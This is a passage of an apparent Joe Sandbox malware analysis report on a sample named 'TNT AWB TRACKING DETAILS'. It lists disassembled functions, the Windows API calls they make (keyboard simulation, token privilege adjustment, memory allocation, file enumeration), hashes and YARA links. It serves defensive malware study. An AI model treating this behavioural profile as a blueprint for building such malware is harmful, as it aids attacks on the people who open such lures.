Opcode Fuzzy Hash: 2f197f165d07becb5113f4dcd47b6ee1f8bc5e2a0cb81f3587fb8cf0b7be9ca7
Instruction Fuzzy Hash: FAF0AF31900609EBDF11AFA48D06FAE36A0BF14325F17841CF824AA191CBB88951DB55

Function 00AA4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4E7E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0f553832b8e496f6c850978e548872d8ebbd2e608f77463db7d7465f14a4347b
Instruction ID: 54a75ed84dc07e0cdb46a2621084897a9a54bdb1ab07991f2f502fa82a0aa37b
Opcode Fuzzy Hash: 0f553832b8e496f6c850978e548872d8ebbd2e608f77463db7d7465f14a4347b
Instruction Fuzzy Hash: 1BF01C71501711CFDB349F64D494852F7F1BF99325310893EF1D683650C7B19840DB40

Function 00AC0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC07B0

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 23a14b1ebf917cb9b7180e984a90f4e51a03132b0ce2fc391ad2c7c8435de1b8
Instruction ID: 2bf5d58ceaa35961ddd77e509334965e45abaa5f4ca99850b4f7e1f960cc2136
Opcode Fuzzy Hash: 23a14b1ebf917cb9b7180e984a90f4e51a03132b0ce2fc391ad2c7c8435de1b8
Instruction Fuzzy Hash: 62E08676A0412857C72196989C05FEA77ADDB896A0F0441B6FC09D7244D9609C8086D0

Function 00B08E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B08EC1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: a222075fb666862e207317848d872f30044e27690d479b5a2eea887cc46184b3
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 6DE012B1504B045BD7398A24D851BA377E1EB05315F04095DF6EA93241EBA278458759

Function 039608E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 039608EB

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 8e0d711e9bb0aec58f469113f2acf3041511c98cbb412ebcad9f5e856526fd96
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 95E08C71A0A20CEBEB20CBB88848AA973A8DB043A0F004A58E81AC3380D5318E609664

Function 00AA5C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00ADDD42,?,?,00000000), ref: 00AA5C5F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 12af93d967a2bcda26257adc005398f240b84385a6b7ec0ee24fb13d4f90e154
Instruction ID: 0c05caf6297b6058a01ffd274c091064143dcf16b13baed78d2784198d89bedb
Opcode Fuzzy Hash: 12af93d967a2bcda26257adc005398f240b84385a6b7ec0ee24fb13d4f90e154
Instruction Fuzzy Hash: D6D0C77464020CBFE710DB80DC46FA9777CD705711F500194FD0467290D6B27D508795

Function 039608B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 039608BB

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: e75c58348143120e0de5121cc83d8b86166d088e54c0a325e61d2c048b7ad42e
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: D0D0A73090B20CEBCB10CFB49C04ADA73ACDB04320F004754FD15D33C0D63299409790

Function 00AC525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00AC5266

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: d0a7136658dddf5bba4b01b09e3c77a707ce730669b629cc20244ac3668025af
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 6CB092B684020CB7CE012A92EC02F897B599B417A4F408020FB0C18162A673A6A49A89

Function 00B0D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00B0D1FF

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 1283e528150b395c5090baabde477a05369c6f8516466c7075eae5849a875631
Instruction ID: f8a5a2b329d01e6bde04c0956e3664a95a0ebcc77566ac74121a81680dc77ff3
Opcode Fuzzy Hash: 1283e528150b395c5090baabde477a05369c6f8516466c7075eae5849a875631
Instruction Fuzzy Hash: ED715E306043018FC714EFA4C591AAEBBE4EF8A354F44496DF9969B3E2DB30E945CB52

Function 00AC0C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00AC0CB7

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c52644d7c74332caf2de253b53b27ad07e538ae9136a47cbed73649313cc1e92
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8C31A070A08105DBCB18DF59C484E69F7B6FB59300B6687A9E84ACB355DA31EDC1DB80

Function 039622CC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 039622E1

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 149e8b9ca98079e1ebf0c576ba9c186368ea5d88f3e5316489ebb186f552a1e4
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 1BE0BF7498110EEFDB00EFA8D5496DE7BB4EF04701F1005A1FD05D7680DB309E549A62

Function 039622D0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 039622E1

Memory Dump Source

Source File: 00000000.00000002.2195463668.0000000003960000.00000040.00001000.00020000.00000000.sdmp, Offset: 03960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3960000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2674d80b8a4765b480220df1728e201946e1a4a2d61390904d368765a5e33bb7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: C9E0E67498110EDFDB00EFB8D54969E7FB4EF04701F1005A1FD01D2280DA309D509A62

Non-executed Functions

Function 00B2CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B2CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CB95
GetWindowLongW.USER32(?,000000F0), ref: 00B2CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2CC00
SendMessageW.USER32 ref: 00B2CC29
_wcsncpy.LIBCMT ref: 00B2CC95
GetKeyState.USER32(00000011), ref: 00B2CCB6
GetKeyState.USER32(00000009), ref: 00B2CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CCD9
GetKeyState.USER32(00000010), ref: 00B2CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2CD0C
SendMessageW.USER32 ref: 00B2CD33
SendMessageW.USER32(?,00001030,?,00B2B348), ref: 00B2CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B2CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B2CE60
SetCapture.USER32(?), ref: 00B2CE69
ClientToScreen.USER32(?,?), ref: 00B2CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B2CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B2CEF5
ReleaseCapture.USER32 ref: 00B2CF00
GetCursorPos.USER32(?), ref: 00B2CF3A
ScreenToClient.USER32(?,?), ref: 00B2CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2CFA3
SendMessageW.USER32 ref: 00B2CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D00E
SendMessageW.USER32 ref: 00B2D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B2D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B2D06D
GetCursorPos.USER32(?), ref: 00B2D08D
ScreenToClient.USER32(?,?), ref: 00B2D09A
GetParent.USER32(?), ref: 00B2D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D123
SendMessageW.USER32 ref: 00B2D154
ClientToScreen.USER32(?,?), ref: 00B2D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B2D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D20C
SendMessageW.USER32 ref: 00B2D22F
ClientToScreen.USER32(?,?), ref: 00B2D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B2D2B5

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

GetWindowLongW.USER32(?,000000F0), ref: 00B2D351

Strings

@GUI_DRAGID, xrefs: 00B2CE9C
F, xrefs: 00B2D235

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: efd99d9dfadbf57c5c96bde0e34bee9da11beec720613576649e8608e213bddc
Instruction ID: bf80844beefc036e35e3be61af5d3f6c3f3b259369a8800ed43227fd0296117e
Opcode Fuzzy Hash: efd99d9dfadbf57c5c96bde0e34bee9da11beec720613576649e8608e213bddc
Instruction Fuzzy Hash: 9F42AF34104295AFD721CF24E888EAABFF5FF49310F1409A9F599872B0CB71D855DB92

Function 00AB6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AB71C3
_memset.LIBCMT ref: 00AB7539
_memmove.LIBCMT ref: 00AB76AC

Strings

\b(?<=\w), xrefs: 00AF3773
[:>:]], xrefs: 00AB7492
[:<:]], xrefs: 00AB7479
DEFINE, xrefs: 00AF2103
Q\E, xrefs: 00AB7FCB
\b(?=\w), xrefs: 00AF3769

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 823dfb2245549f9235f71f01315aa7d78edf571897e2cbf830b91deee8e49970
Instruction ID: ad3ddadd146649f6bfc0b8d1a6eaed4f8f35779627d5c8e93fd7068e0fdb4994
Opcode Fuzzy Hash: 823dfb2245549f9235f71f01315aa7d78edf571897e2cbf830b91deee8e49970
Instruction Fuzzy Hash: 47938F75A04219DBDF24CF98C891BFDB7B1FF48310F25816AEA55AB281E7749E81CB40

Function 00AA48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00AA48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ADD665
IsIconic.USER32(?), ref: 00ADD66E
ShowWindow.USER32(?,00000009), ref: 00ADD67B
SetForegroundWindow.USER32(?), ref: 00ADD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ADD69B
GetCurrentThreadId.KERNEL32 ref: 00ADD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00ADD6CF
SetForegroundWindow.USER32(?), ref: 00ADD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD6E7
keybd_event.USER32(00000012,00000000), ref: 00ADD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD6FC
keybd_event.USER32(00000012,00000000), ref: 00ADD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD70A
keybd_event.USER32(00000012,00000000), ref: 00ADD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADD719
keybd_event.USER32(00000012,00000000), ref: 00ADD71E
SetForegroundWindow.USER32(?), ref: 00ADD721
AttachThreadInput.USER32(?,?,00000000), ref: 00ADD748

Strings

Shell_TrayWnd, xrefs: 00ADD660

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f7d672d51bed06715436e9e46d0cb31891d3211162b5efc927b1e2a658fdecd7
Instruction ID: 18844e6f89f905c90aa9ee421b13c869647fe6db83114e14e74de946082b5bd7
Opcode Fuzzy Hash: f7d672d51bed06715436e9e46d0cb31891d3211162b5efc927b1e2a658fdecd7
Instruction Fuzzy Hash: 4F315071A40318BAEB316BA19C49F7F7E7CEB44B50F104076FA05EB1D1CAB45D12AAA1

Function 00AF8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00AF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF882B
Part of subcall function 00AF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8858
Part of subcall function 00AF87E1: GetLastError.KERNEL32 ref: 00AF8865

_memset.LIBCMT ref: 00AF8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AF83A5
CloseHandle.KERNEL32(?), ref: 00AF83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AF83CD
GetProcessWindowStation.USER32 ref: 00AF83E6
SetProcessWindowStation.USER32(00000000), ref: 00AF83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AF840A

Part of subcall function 00AF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8309), ref: 00AF81E0
Part of subcall function 00AF81CB: CloseHandle.KERNEL32(?,?,00AF8309), ref: 00AF81F2

Strings

default, xrefs: 00AF8405
, xrefs: 00AF8362
winsta0, xrefs: 00AF83C8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 751ef2fe1379a9c114f4fb7344478757c67cae5a54cb6b935cec6b08d0191cba
Instruction ID: 976ee06e44df8d7dffa5dc0a2ad7690c72d2e322976f64ccb100319609573a72
Opcode Fuzzy Hash: 751ef2fe1379a9c114f4fb7344478757c67cae5a54cb6b935cec6b08d0191cba
Instruction Fuzzy Hash: 0C81587190020DAFDF219FE4DD45AFEBBB9EF08704F144169FA10A6261DB398E19DB60

Function 00B0C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0C78D
FindClose.KERNEL32(00000000), ref: 00B0C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B0C844
__swprintf.LIBCMT ref: 00B0C890
__swprintf.LIBCMT ref: 00B0C8D3

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

__swprintf.LIBCMT ref: 00B0C927

Part of subcall function 00AC3698: __woutput_l.LIBCMT ref: 00AC36F1

__swprintf.LIBCMT ref: 00B0C975

Part of subcall function 00AC3698: __flsbuf.LIBCMT ref: 00AC3713
Part of subcall function 00AC3698: __flsbuf.LIBCMT ref: 00AC372B

__swprintf.LIBCMT ref: 00B0C9C4
__swprintf.LIBCMT ref: 00B0CA13
__swprintf.LIBCMT ref: 00B0CA62

Strings

%4d, xrefs: 00B0C8CD
%02d, xrefs: 00B0C91B, 00B0C925, 00B0C973, 00B0C9C2, 00B0CA11, 00B0CA60
%4d%02d%02d%02d%02d%02d, xrefs: 00B0C88A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: cbdc4bd7f2fc249433cf26ff97b5283ad1776a44ebce165d05fb0f18cb3558d5
Instruction ID: de9d7b22435b2511ee52ac21f33c4916a8029959aa0086d7321a09783529feae
Opcode Fuzzy Hash: cbdc4bd7f2fc249433cf26ff97b5283ad1776a44ebce165d05fb0f18cb3558d5
Instruction Fuzzy Hash: 91A109B2508305ABC710EBA4C985EAFB7ECEF99700F40492DF58587191EB34DA08CB62

Function 00B0EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B0EFB6
_wcscmp.LIBCMT ref: 00B0EFCB
_wcscmp.LIBCMT ref: 00B0EFE2
GetFileAttributesW.KERNEL32(?), ref: 00B0EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00B0F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00B0F026
FindClose.KERNEL32(00000000), ref: 00B0F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F04D
_wcscmp.LIBCMT ref: 00B0F074
_wcscmp.LIBCMT ref: 00B0F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F09D
SetCurrentDirectoryW.KERNEL32(00B58920), ref: 00B0F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F0C5
FindClose.KERNEL32(00000000), ref: 00B0F0D2
FindClose.KERNEL32(00000000), ref: 00B0F0E4

Strings

